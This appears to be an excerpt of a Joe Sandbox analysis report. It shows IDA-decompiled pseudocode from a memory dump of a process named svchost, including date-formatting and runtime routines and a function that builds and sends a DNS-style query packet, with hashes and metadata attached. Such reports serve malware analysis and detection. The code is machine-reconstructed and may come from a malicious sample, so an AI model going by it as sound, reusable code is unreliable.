                                                                                                                                                                                                                                                                            			E04011E70(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                            				signed short _v8;
                                                                                                                                                                                                                                                                            				signed short _v10;
                                                                                                                                                                                                                                                                            				signed short _v12;
                                                                                                                                                                                                                                                                            				signed short _v14;
                                                                                                                                                                                                                                                                            				signed short _v16;
                                                                                                                                                                                                                                                                            				signed short _v18;
                                                                                                                                                                                                                                                                            				signed short _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				void _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                                                                            				void _v120;
                                                                                                                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                                                                                                                            				void _v156;
                                                                                                                                                                                                                                                                            				signed int _v332;
                                                                                                                                                                                                                                                                            				intOrPtr _v336;
                                                                                                                                                                                                                                                                            				intOrPtr _v340;
                                                                                                                                                                                                                                                                            				intOrPtr _v344;
                                                                                                                                                                                                                                                                            				intOrPtr _v348;
                                                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                                                            				signed int _t107;
                                                                                                                                                                                                                                                                            				signed int _t141;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t95 = __ebx;
                                                                                                                                                                                                                                                                            				_v24 =  *0x429024 ^ _t141;
                                                                                                                                                                                                                                                                            				_v348 = __ecx;
                                                                                                                                                                                                                                                                            				_v64 = 0;
                                                                                                                                                                                                                                                                            				memcpy( &_v60, 0x426fdc, 8 << 2);
                                                                                                                                                                                                                                                                            				asm("movsw");
                                                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                                                            				memcpy( &_v156, 0x427000, 7 << 2);
                                                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                                                            				memcpy( &_v120, 0x427020, 0xc << 2);
                                                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                                                            				_v336 = E04020CE0(0x3d);
                                                                                                                                                                                                                                                                            				_v124 = _v336;
                                                                                                                                                                                                                                                                            				E04007010(0x427038, _v124, 0, 0x3d);
                                                                                                                                                                                                                                                                            				 *0x425108( &_v332);
                                                                                                                                                                                                                                                                            				 *0x425180( &_v20);
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				_t107 = _v332 / 0x3c * 0x64 + _v332 % 0x3c;
                                                                                                                                                                                                                                                                            				_v68 = _t107;
                                                                                                                                                                                                                                                                            				if(_t107 < 0) {
                                                                                                                                                                                                                                                                            					_v68 =  ~_v68;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_v332 > 0) {
                                                                                                                                                                                                                                                                            					_v352 = 0x427058;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v352 = 0x427054;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t33 =  &_v352; // 0x427058
                                                                                                                                                                                                                                                                            				 *0x4251f8(_v124, 0x3c,  &_v60, _t141 + (_v16 & 0x0000ffff) * 4 - 0x98, _v14 & 0x0000ffff, _t141 + (_v18 & 0x0000ffff) * 4 - 0x78, _v20 & 0x0000ffff, _v12 & 0x0000ffff, _v10 & 0x0000ffff, _v8 & 0x0000ffff,  *_t33, _v68);
                                                                                                                                                                                                                                                                            				_v340 = E04020CE0(8);
                                                                                                                                                                                                                                                                            				if(_v340 == 0) {
                                                                                                                                                                                                                                                                            					_v356 = 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v356 = E0401F4E0(_v340);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v64 = _v356;
                                                                                                                                                                                                                                                                            				_t125 = _v124;
                                                                                                                                                                                                                                                                            				E0401FC90(_t95, _v64, 0x427038, 0x3c, _v124, E040070A0(_v124));
                                                                                                                                                                                                                                                                            				if(_v124 != 0) {
                                                                                                                                                                                                                                                                            					_v344 = _v124;
                                                                                                                                                                                                                                                                            					_t125 = _v344;
                                                                                                                                                                                                                                                                            					E04020CC0(_v344);
                                                                                                                                                                                                                                                                            					_v124 = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return E04006C8C(_v64, _t95, _v24 ^ _t141, _t125, 0x427038, 0x3c);
                                                                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                                                                            0x04011e70
                                                                                                                                                                                                                                                                            0x04011e80
                                                                                                                                                                                                                                                                            0x04011e85
                                                                                                                                                                                                                                                                            0x04011e8b
                                                                                                                                                                                                                                                                            0x04011e9f
                                                                                                                                                                                                                                                                            0x04011ea1
                                                                                                                                                                                                                                                                            0x04011ea3
                                                                                                                                                                                                                                                                            0x04011eb4
                                                                                                                                                                                                                                                                            0x04011eb6
                                                                                                                                                                                                                                                                            0x04011ec4
                                                                                                                                                                                                                                                                            0x04011ec6
                                                                                                                                                                                                                                                                            0x04011ed1
                                                                                                                                                                                                                                                                            0x04011edd
                                                                                                                                                                                                                                                                            0x04011ee8
                                                                                                                                                                                                                                                                            0x04011ef7
                                                                                                                                                                                                                                                                            0x04011f01
                                                                                                                                                                                                                                                                            0x04011f0d
                                                                                                                                                                                                                                                                            0x04011f20
                                                                                                                                                                                                                                                                            0x04011f28
                                                                                                                                                                                                                                                                            0x04011f2a
                                                                                                                                                                                                                                                                            0x04011f2d
                                                                                                                                                                                                                                                                            0x04011f34
                                                                                                                                                                                                                                                                            0x04011f34
                                                                                                                                                                                                                                                                            0x04011f3e
                                                                                                                                                                                                                                                                            0x04011f4c
                                                                                                                                                                                                                                                                            0x04011f40
                                                                                                                                                                                                                                                                            0x04011f40
                                                                                                                                                                                                                                                                            0x04011f40
                                                                                                                                                                                                                                                                            0x04011f5a
                                                                                                                                                                                                                                                                            0x04011f99
                                                                                                                                                                                                                                                                            0x04011fac
                                                                                                                                                                                                                                                                            0x04011fb9
                                                                                                                                                                                                                                                                            0x04011fce
                                                                                                                                                                                                                                                                            0x04011fbb
                                                                                                                                                                                                                                                                            0x04011fc6
                                                                                                                                                                                                                                                                            0x04011fc6
                                                                                                                                                                                                                                                                            0x04011fde
                                                                                                                                                                                                                                                                            0x04011fe1
                                                                                                                                                                                                                                                                            0x04011ff5
                                                                                                                                                                                                                                                                            0x04011ffe
                                                                                                                                                                                                                                                                            0x04012003
                                                                                                                                                                                                                                                                            0x04012009
                                                                                                                                                                                                                                                                            0x04012010
                                                                                                                                                                                                                                                                            0x04012018
                                                                                                                                                                                                                                                                            0x04012018
                                                                                                                                                                                                                                                                            0x04012031

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                                            • String ID: pB$XpB
                                                                                                                                                                                                                                                                            • API String ID: 3713721629-2178088481
                                                                                                                                                                                                                                                                            • Opcode ID: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                                            • Instruction ID: caac39b4c571324483d0a18a7aa4e44b6fb00a313373015349f42bda7133a820
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A513EB1E04228DBEB24DF95DC44BEEB7B5BB88308F1041A9E509BB290D7756A84CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                                                                            • String ID: '$'
                                                                                                                                                                                                                                                                            • API String ID: 2102423945-2527190458
                                                                                                                                                                                                                                                                            • Opcode ID: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                                            • Instruction ID: 53bb57586c5e39befda5455b8bbd06f4bf2bc56d3601b69197fc609fafef56d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C418171B04329EBEB20DFA0CC45FED77B4AB44704F804599B609BA1C0D7B5A644CF96
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                                                                            			E040093F6(intOrPtr* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t35 = __ebx;
                                                                                                                                                                                                                                                                            				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                            				_t23 =  *0x425190(0x425310, 0x427a18, 0xc);
                                                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                                                            					_t23 = E040099AE(0x425310);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t46 - 0x1c)) = _t23;
                                                                                                                                                                                                                                                                            				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t45 + 0x5c)) = 0x4259d0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                                                                                                                                                                                                            				if(_t23 != 0) {
                                                                                                                                                                                                                                                                            					_t35 =  *0x425114;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t45 + 0x1f8)) =  *_t35(_t23, 0x425300);
                                                                                                                                                                                                                                                                            					_t6 = _t46 - 0x1c; // 0x42532c
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t45 + 0x1fc)) =  *_t35( *_t6, 0x42532c);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                                                                                                                                                                                                            				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                                                                                                                                                                                                            				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t45 + 0x68)) = 0x4294e8;
                                                                                                                                                                                                                                                                            				E0400B404(_t35, 0xd);
                                                                                                                                                                                                                                                                            				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                            				 *0x4250a4( *((intOrPtr*)(_t45 + 0x68)));
                                                                                                                                                                                                                                                                            				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                            				E040094CB();
                                                                                                                                                                                                                                                                            				E0400B404(_t35, 0xc);
                                                                                                                                                                                                                                                                            				 *(_t46 - 4) = 1;
                                                                                                                                                                                                                                                                            				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t45 + 0x6c)) =  *0x4294d8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E0400CA63( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                                                                                                                                                                                                            				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                            				return E04009D2D(E040094D4());
                                                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                                                            0x040093f6
                                                                                                                                                                                                                                                                            0x040093fd
                                                                                                                                                                                                                                                                            0x04009408
                                                                                                                                                                                                                                                                            0x04009410
                                                                                                                                                                                                                                                                            0x04009413
                                                                                                                                                                                                                                                                            0x04009418
                                                                                                                                                                                                                                                                            0x04009419
                                                                                                                                                                                                                                                                            0x0400941c
                                                                                                                                                                                                                                                                            0x0400941f
                                                                                                                                                                                                                                                                            0x04009429
                                                                                                                                                                                                                                                                            0x0400942e
                                                                                                                                                                                                                                                                            0x04009436
                                                                                                                                                                                                                                                                            0x0400943e
                                                                                                                                                                                                                                                                            0x04009449
                                                                                                                                                                                                                                                                            0x0400944e
                                                                                                                                                                                                                                                                            0x0400944e
                                                                                                                                                                                                                                                                            0x04009454
                                                                                                                                                                                                                                                                            0x04009457
                                                                                                                                                                                                                                                                            0x0400945e
                                                                                                                                                                                                                                                                            0x04009465
                                                                                                                                                                                                                                                                            0x0400946e
                                                                                                                                                                                                                                                                            0x04009474
                                                                                                                                                                                                                                                                            0x0400947b
                                                                                                                                                                                                                                                                            0x04009481
                                                                                                                                                                                                                                                                            0x04009488
                                                                                                                                                                                                                                                                            0x0400948f
                                                                                                                                                                                                                                                                            0x04009495
                                                                                                                                                                                                                                                                            0x04009498
                                                                                                                                                                                                                                                                            0x0400949b
                                                                                                                                                                                                                                                                            0x040094a0
                                                                                                                                                                                                                                                                            0x040094a7
                                                                                                                                                                                                                                                                            0x040094a7
                                                                                                                                                                                                                                                                            0x040094ad
                                                                                                                                                                                                                                                                            0x040094b3
                                                                                                                                                                                                                                                                            0x040094c4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                                            • String ID: ,SB
                                                                                                                                                                                                                                                                            • API String ID: 1628550938-3344058557
                                                                                                                                                                                                                                                                            • Opcode ID: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                                            • Instruction ID: 993150cf3f8eb55d910a7a38cf2a2ebf2ab550eb7e4aba8557308306761a1f3f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F1193B1904B019EF720EF759801B99BBE0AF00318F50C51AD599A72D1C774A641CB59
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                                                            			E0401A890(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				short* _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				short* _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				short* _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				char _v292;
                                                                                                                                                                                                                                                                            				intOrPtr _v296;
                                                                                                                                                                                                                                                                            				char _v300;
                                                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                                                            				intOrPtr _v308;
                                                                                                                                                                                                                                                                            				intOrPtr _v312;
                                                                                                                                                                                                                                                                            				intOrPtr _v316;
                                                                                                                                                                                                                                                                            				intOrPtr _v320;
                                                                                                                                                                                                                                                                            				intOrPtr _t138;
                                                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                                                            				signed char _t187;
                                                                                                                                                                                                                                                                            				signed char _t192;
                                                                                                                                                                                                                                                                            				void* _t195;
                                                                                                                                                                                                                                                                            				void* _t253;
                                                                                                                                                                                                                                                                            				void* _t254;
                                                                                                                                                                                                                                                                            				signed int _t255;
                                                                                                                                                                                                                                                                            				void* _t256;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t254 = __esi;
                                                                                                                                                                                                                                                                            				_t253 = __edi;
                                                                                                                                                                                                                                                                            				_t195 = __ebx;
                                                                                                                                                                                                                                                                            				_v36 =  *0x429024 ^ _t255;
                                                                                                                                                                                                                                                                            				_v320 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                                            				while(_a4 != 0 && _a12 != 0 && _a16 >= 1 && _a16 <= 3) {
                                                                                                                                                                                                                                                                            					_t138 = E040070A0(_a4);
                                                                                                                                                                                                                                                                            					_t256 = _t256 + 4;
                                                                                                                                                                                                                                                                            					_v296 = _t138;
                                                                                                                                                                                                                                                                            					if(_v296 >= 1) {
                                                                                                                                                                                                                                                                            						E04007010(_t253,  &_v292, 0, 0xff);
                                                                                                                                                                                                                                                                            						_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                            						_t228 =  &_v292;
                                                                                                                                                                                                                                                                            						_v20 = E04019850(_v320, _a4, _v296,  &_v292, 0xff);
                                                                                                                                                                                                                                                                            						if(_v20 >= 1) {
                                                                                                                                                                                                                                                                            							_v300 = 0;
                                                                                                                                                                                                                                                                            							if(_a16 != 1) {
                                                                                                                                                                                                                                                                            								if(_a16 != 2) {
                                                                                                                                                                                                                                                                            									if(_a16 != 3) {
                                                                                                                                                                                                                                                                            										goto L22;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v304 =  *0x425260(_a12);
                                                                                                                                                                                                                                                                            										if(_v304 != 0) {
                                                                                                                                                                                                                                                                            											_v300 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v304 + 0xc))))));
                                                                                                                                                                                                                                                                            											_t187 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                                            											_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                            											if((_t187 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            												E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                                            												_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											goto L22;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v300 =  *0x425258(_a12);
                                                                                                                                                                                                                                                                            									_t192 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                                            									_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                            									if((_t192 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            										E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                                            										_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L22;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v300 = _a12;
                                                                                                                                                                                                                                                                            								L22:
                                                                                                                                                                                                                                                                            								_v308 = E04020CE0(0x1000);
                                                                                                                                                                                                                                                                            								_v32 = _v308;
                                                                                                                                                                                                                                                                            								E04007010(_t253, _v32, 0, 0x1000);
                                                                                                                                                                                                                                                                            								_v16 = 0;
                                                                                                                                                                                                                                                                            								_v28 = 0;
                                                                                                                                                                                                                                                                            								_v16 = _v32;
                                                                                                                                                                                                                                                                            								 *_v16 =  *0x4250b4();
                                                                                                                                                                                                                                                                            								 *(_v16 + 2) =  *(_v16 + 2) & 0x0000007f;
                                                                                                                                                                                                                                                                            								 *(_v16 + 2) =  *(_v16 + 2) & 0x00000087;
                                                                                                                                                                                                                                                                            								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fb;
                                                                                                                                                                                                                                                                            								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fd;
                                                                                                                                                                                                                                                                            								 *(_v16 + 2) =  *(_v16 + 2) | 0x00000001;
                                                                                                                                                                                                                                                                            								 *(_v16 + 3) =  *(_v16 + 3) & 0x0000007f;
                                                                                                                                                                                                                                                                            								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000bf;
                                                                                                                                                                                                                                                                            								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000df;
                                                                                                                                                                                                                                                                            								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000ef;
                                                                                                                                                                                                                                                                            								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000f0;
                                                                                                                                                                                                                                                                            								 *((short*)(_v16 + 4)) =  *0x425278(1);
                                                                                                                                                                                                                                                                            								 *((short*)(_v16 + 6)) = 0;
                                                                                                                                                                                                                                                                            								 *((short*)(_v16 + 8)) = 0;
                                                                                                                                                                                                                                                                            								 *((short*)(_v16 + 0xa)) = 0;
                                                                                                                                                                                                                                                                            								E04006CA0(_t195, _t253, _t254, _v32 + 0xc,  &_v292);
                                                                                                                                                                                                                                                                            								_v28 = _v32 + E04008A9C( &_v292, 0xfe) + 0xd;
                                                                                                                                                                                                                                                                            								 *_v28 =  *0x425278(_a8 & 0x0000ffff, _v20);
                                                                                                                                                                                                                                                                            								 *((short*)(_v28 + 2)) =  *0x425278(1);
                                                                                                                                                                                                                                                                            								_t177 = E04008A9C( &_v292, 0xfe);
                                                                                                                                                                                                                                                                            								_t256 = _t256 + 0x2c;
                                                                                                                                                                                                                                                                            								_v24 = _t177 + 0x11;
                                                                                                                                                                                                                                                                            								_t228 = _v32;
                                                                                                                                                                                                                                                                            								_v8 = E0401D100(_t195,  *((intOrPtr*)(_v320 + 0x10)), _t253, _t254, _v300, 0x35, _v32, _v24);
                                                                                                                                                                                                                                                                            								if(_v32 != 0) {
                                                                                                                                                                                                                                                                            									_t228 = _v32;
                                                                                                                                                                                                                                                                            									_v312 = _v32;
                                                                                                                                                                                                                                                                            									E04020CC0(_v312);
                                                                                                                                                                                                                                                                            									_t256 = _t256 + 4;
                                                                                                                                                                                                                                                                            									_v32 = 0;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(0 != 0) {
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L25:
                                                                                                                                                                                                                                                                            					if(_v8 == 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                            						_t228 = _v12;
                                                                                                                                                                                                                                                                            						_v316 = _v12;
                                                                                                                                                                                                                                                                            						E04020CC0(_v316);
                                                                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return E04006C8C(_v8, _t195, _v36 ^ _t255, _t228, _t253, _t254);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L25;
                                                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                                                            0x0401a890
                                                                                                                                                                                                                                                                            0x0401a890
                                                                                                                                                                                                                                                                            0x0401a890
                                                                                                                                                                                                                                                                            0x0401a8a0
                                                                                                                                                                                                                                                                            0x0401a8a3
                                                                                                                                                                                                                                                                            0x0401a8a9
                                                                                                                                                                                                                                                                            0x0401a8b0
                                                                                                                                                                                                                                                                            0x0401a8b7
                                                                                                                                                                                                                                                                            0x0401a8d8
                                                                                                                                                                                                                                                                            0x0401a8dd
                                                                                                                                                                                                                                                                            0x0401a8e0
                                                                                                                                                                                                                                                                            0x0401a8ed
                                                                                                                                                                                                                                                                            0x0401a902
                                                                                                                                                                                                                                                                            0x0401a907
                                                                                                                                                                                                                                                                            0x0401a90f
                                                                                                                                                                                                                                                                            0x0401a92c
                                                                                                                                                                                                                                                                            0x0401a933
                                                                                                                                                                                                                                                                            0x0401a93a
                                                                                                                                                                                                                                                                            0x0401a948
                                                                                                                                                                                                                                                                            0x0401a95c
                                                                                                                                                                                                                                                                            0x0401a9a5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401a9a7
                                                                                                                                                                                                                                                                            0x0401a9b1
                                                                                                                                                                                                                                                                            0x0401a9be
                                                                                                                                                                                                                                                                            0x0401a9cd
                                                                                                                                                                                                                                                                            0x0401a9e0
                                                                                                                                                                                                                                                                            0x0401a9e5
                                                                                                                                                                                                                                                                            0x0401a9ed
                                                                                                                                                                                                                                                                            0x0401a9fc
                                                                                                                                                                                                                                                                            0x0401aa01
                                                                                                                                                                                                                                                                            0x0401aa01
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401aa04
                                                                                                                                                                                                                                                                            0x0401a9be
                                                                                                                                                                                                                                                                            0x0401a95e
                                                                                                                                                                                                                                                                            0x0401a968
                                                                                                                                                                                                                                                                            0x0401a97b
                                                                                                                                                                                                                                                                            0x0401a980
                                                                                                                                                                                                                                                                            0x0401a988
                                                                                                                                                                                                                                                                            0x0401a997
                                                                                                                                                                                                                                                                            0x0401a99c
                                                                                                                                                                                                                                                                            0x0401a99c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401a99f
                                                                                                                                                                                                                                                                            0x0401a94a
                                                                                                                                                                                                                                                                            0x0401a94d
                                                                                                                                                                                                                                                                            0x0401aa0b
                                                                                                                                                                                                                                                                            0x0401aa18
                                                                                                                                                                                                                                                                            0x0401aa24
                                                                                                                                                                                                                                                                            0x0401aa32
                                                                                                                                                                                                                                                                            0x0401aa3a
                                                                                                                                                                                                                                                                            0x0401aa41
                                                                                                                                                                                                                                                                            0x0401aa4b
                                                                                                                                                                                                                                                                            0x0401aa57
                                                                                                                                                                                                                                                                            0x0401aa65
                                                                                                                                                                                                                                                                            0x0401aa73
                                                                                                                                                                                                                                                                            0x0401aa81
                                                                                                                                                                                                                                                                            0x0401aa8f
                                                                                                                                                                                                                                                                            0x0401aa9d
                                                                                                                                                                                                                                                                            0x0401aaab
                                                                                                                                                                                                                                                                            0x0401aab9
                                                                                                                                                                                                                                                                            0x0401aac7
                                                                                                                                                                                                                                                                            0x0401aad5
                                                                                                                                                                                                                                                                            0x0401aae3
                                                                                                                                                                                                                                                                            0x0401aaf1
                                                                                                                                                                                                                                                                            0x0401aafa
                                                                                                                                                                                                                                                                            0x0401ab03
                                                                                                                                                                                                                                                                            0x0401ab0c
                                                                                                                                                                                                                                                                            0x0401ab22
                                                                                                                                                                                                                                                                            0x0401ab45
                                                                                                                                                                                                                                                                            0x0401ab56
                                                                                                                                                                                                                                                                            0x0401ab64
                                                                                                                                                                                                                                                                            0x0401ab74
                                                                                                                                                                                                                                                                            0x0401ab79
                                                                                                                                                                                                                                                                            0x0401ab7f
                                                                                                                                                                                                                                                                            0x0401ab86
                                                                                                                                                                                                                                                                            0x0401aba1
                                                                                                                                                                                                                                                                            0x0401aba8
                                                                                                                                                                                                                                                                            0x0401abaa
                                                                                                                                                                                                                                                                            0x0401abad
                                                                                                                                                                                                                                                                            0x0401abba
                                                                                                                                                                                                                                                                            0x0401abbf
                                                                                                                                                                                                                                                                            0x0401abc2
                                                                                                                                                                                                                                                                            0x0401abc2
                                                                                                                                                                                                                                                                            0x0401abcb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401abcb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401a935
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401a8ef
                                                                                                                                                                                                                                                                            0x0401abd1
